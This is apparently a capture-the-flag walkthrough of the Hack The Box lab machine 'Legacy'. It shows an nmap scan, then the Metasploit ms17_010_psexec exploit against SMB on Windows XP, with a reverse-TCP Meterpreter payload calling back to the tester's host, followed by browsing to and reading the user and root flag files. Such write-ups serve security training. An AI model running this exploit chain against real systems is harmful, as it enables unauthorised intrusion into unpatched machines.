I first started by running NMap against the host to discover running services:
# Nmap 7.80 scan initiated Tue Sep 15 14:12:48 2020 as: nmap -O -sV -sC -p- -oN scan 10.10.10.4 Nmap scan report for 10.10.10.4 Host is up (0.019s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows XP microsoft-ds 3389/tcp closed ms-wbt-server Device type: general purpose|specialized Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (88%) OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2 Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows XP (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows 2000 SP4 (91%), Microsoft Windows XP SP2 or Windows Server 2003 (91%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 (90%) No exact OS matches for host (test conditions non-ideal). Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp Host script results: |_clock-skew: mean: 5d00h29m49s, deviation: 2h07m16s, median: 4d22h59m49s |_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:df:de (VMware) | smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager) | OS CPE: cpe:/o:microsoft:windows_xp::- | Computer name: legacy | NetBIOS computer name: LEGACY\x00 | Workgroup: HTB\x00 |_ System time: 2020-09-20T23:14:42+03:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Sep 15 14:15:43 2020 -- 1 IP address (1 host up) scanned in 175.19 seconds
We can see from this output that there are 2 ports open. 139 and 445. The SMB discovery script had also run and this service was running. Although there were no SMB shares.
Eternal Blue is one of the more common exploits for SMB, especially considering the OS is WinXP. I started Metasploit and loaded the MS17_010 exploit and ran it:
msf5 > use windows/smb/ms17_010_psexec [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 10.10.10.4 rhost => 10.10.10.4 msf5 exploit(windows/smb/ms17_010_psexec) > set lhost 10.10.14.16 lhost => 10.10.14.16 msf5 exploit(windows/smb/ms17_010_psexec) > run [*] Started reverse TCP handler on 10.10.14.16:4444 [*] 10.10.10.4:445 - Target OS: Windows 5.1 [*] 10.10.10.4:445 - Filling barrel with fish... done [*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ----------------> [*] 10.10.10.4:445 - [*] Preparing dynamite... [*] 10.10.10.4:445 - [*] Trying stick 1 (x86)...Boom! [*] 10.10.10.4:445 - [+] Successfully Leaked Transaction! [*] 10.10.10.4:445 - [+] Successfully caught Fish-in-a-barrel [*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ----------------> [*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x82256da8 [*] 10.10.10.4:445 - Built a write-what-where primitive... [+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained! [*] 10.10.10.4:445 - Selecting native target [*] 10.10.10.4:445 - Uploading payload... KpPkSPCi.exe [*] 10.10.10.4:445 - Created \KpPkSPCi.exe... [+] 10.10.10.4:445 - Service started successfully... [*] Sending stage (176195 bytes) to 10.10.10.4 [*] 10.10.10.4:445 - Deleting \KpPkSPCi.exe... [*] Meterpreter session 1 opened (10.10.14.16:4444 -> 10.10.10.4:1033) at 2020-09-15 15:26:50 -0400 meterpreter > meterpreter > cd / meterpreter > ls Listing: C:\ ============ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100777/rwxrwxrwx 0 fil 2017-03-16 01:30:44 -0400 AUTOEXEC.BAT 100666/rw-rw-rw- 0 fil 2017-03-16 01:30:44 -0400 CONFIG.SYS 40777/rwxrwxrwx 0 dir 2017-03-16 01:20:29 -0400 Documents and Settings 100444/r--r--r-- 0 fil 2017-03-16 01:30:44 -0400 IO.SYS 100444/r--r--r-- 0 fil 2017-03-16 01:30:44 -0400 MSDOS.SYS 100555/r-xr-xr-x 47564 fil 2008-04-13 16:13:04 -0400 NTDETECT.COM 40555/r-xr-xr-x 0 dir 2017-03-16 01:20:57 -0400 Program Files 40777/rwxrwxrwx 0 dir 2017-03-16 01:20:30 -0400 System Volume Information 40777/rwxrwxrwx 0 dir 2017-03-16 01:18:34 -0400 WINDOWS 100666/rw-rw-rw- 211 fil 2017-03-16 01:20:02 -0400 boot.ini 100444/r--r--r-- 250048 fil 2008-04-13 18:01:44 -0400 ntldr 60401544/r-xr--r-- 48691528838709231 fif 1551977431-11-15 22:18:24 -0500 pagefile.sys 100666/rw-rw-rw- 0 fil 2020-09-20 17:03:03 -0400 pwned.txt meterpreter > cd Documents\ and\ Settings meterpreter > ls Listing: C:\Documents and Settings ================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Administrator 40777/rwxrwxrwx 0 dir 2017-03-16 01:20:29 -0400 All Users 40777/rwxrwxrwx 0 dir 2017-03-16 01:20:29 -0400 Default User 40777/rwxrwxrwx 0 dir 2017-03-16 01:32:52 -0400 LocalService 40777/rwxrwxrwx 0 dir 2017-03-16 01:32:42 -0400 NetworkService 40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 john meterpreter > cd john meterpreter > ls Listing: C:\Documents and Settings\john ======================================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 Application Data 40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 Cookies 40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 Desktop 40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 Favorites 40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 Local Settings 40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 My Documents 100666/rw-rw-rw- 524288 fil 2017-03-16 01:33:41 -0400 NTUSER.DAT 100666/rw-rw-rw- 1024 fil 2017-03-16 01:33:41 -0400 NTUSER.DAT.LOG 40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 NetHood 40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 PrintHood 40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 Recent 40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 SendTo 40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 Start Menu 40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 Templates 100666/rw-rw-rw- 178 fil 2017-03-16 01:33:42 -0400 ntuser.ini meterpreter > cd Desktop meterpreter > ls Listing: C:\Documents and Settings\john\Desktop =============================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100444/r--r--r-- 32 fil 2017-03-16 02:19:32 -0400 user.txt meterpreter > cat user.txt [REDACTED] meterpreter >
From this output, you can see the exploit successfully ran and i was provided a meterpreter shell. From this shell i was able to browse to the Desktop under the John user and read the user flag.
I next tried to browse to the Adminstrator desktop and was successfully able to do this as well, allowing me to also capture the root flag.
meterpreter > cd / meterpreter > ls Listing: C:\ ============ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100777/rwxrwxrwx 0 fil 2017-03-16 01:30:44 -0400 AUTOEXEC.BAT 100666/rw-rw-rw- 0 fil 2017-03-16 01:30:44 -0400 CONFIG.SYS 40777/rwxrwxrwx 0 dir 2017-03-16 01:20:29 -0400 Documents and Settings 100444/r--r--r-- 0 fil 2017-03-16 01:30:44 -0400 IO.SYS 100444/r--r--r-- 0 fil 2017-03-16 01:30:44 -0400 MSDOS.SYS 100555/r-xr-xr-x 47564 fil 2008-04-13 16:13:04 -0400 NTDETECT.COM 40555/r-xr-xr-x 0 dir 2017-03-16 01:20:57 -0400 Program Files 40777/rwxrwxrwx 0 dir 2017-03-16 01:20:30 -0400 System Volume Information 40777/rwxrwxrwx 0 dir 2017-03-16 01:18:34 -0400 WINDOWS 100666/rw-rw-rw- 211 fil 2017-03-16 01:20:02 -0400 boot.ini 100444/r--r--r-- 250048 fil 2008-04-13 18:01:44 -0400 ntldr 60401544/r-xr--r-- 48691528838709231 fif 1551977431-11-15 22:18:24 -0500 pagefile.sys 100666/rw-rw-rw- 0 fil 2020-09-20 17:03:03 -0400 pwned.txt meterpreter > cd Documents\ and\ Settings meterpreter > ls Listing: C:\Documents and Settings ================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Administrator 40777/rwxrwxrwx 0 dir 2017-03-16 01:20:29 -0400 All Users 40777/rwxrwxrwx 0 dir 2017-03-16 01:20:29 -0400 Default User 40777/rwxrwxrwx 0 dir 2017-03-16 01:32:52 -0400 LocalService 40777/rwxrwxrwx 0 dir 2017-03-16 01:32:42 -0400 NetworkService 40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 john meterpreter > cd Administrator meterpreter > ls Listing: C:\Documents and Settings\Administrator ================================================ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40555/r-xr-xr-x 0 dir 2017-03-16 02:07:20 -0400 Application Data 40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Cookies 40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Desktop 40555/r-xr-xr-x 0 dir 2017-03-16 02:07:20 -0400 Favorites 40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Local Settings 40555/r-xr-xr-x 0 dir 2017-03-16 02:07:20 -0400 My Documents 100666/rw-rw-rw- 786432 fil 2017-03-16 02:07:20 -0400 NTUSER.DAT 100666/rw-rw-rw- 1024 fil 2017-03-16 02:07:20 -0400 NTUSER.DAT.LOG 40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 NetHood 40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 PrintHood 40555/r-xr-xr-x 0 dir 2017-03-16 02:07:20 -0400 Recent 40555/r-xr-xr-x 0 dir 2017-03-16 02:07:20 -0400 SendTo 40555/r-xr-xr-x 0 dir 2017-03-16 02:07:20 -0400 Start Menu 40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Templates 100666/rw-rw-rw- 178 fil 2017-03-16 02:07:21 -0400 ntuser.ini meterpreter > cd Desktop meterpreter > ls Listing: C:\Documents and Settings\Administrator\Desktop ======================================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100444/r--r--r-- 32 fil 2017-03-16 02:18:19 -0400 root.txt meterpreter > cat root.txt [REDACTED] meterpreter >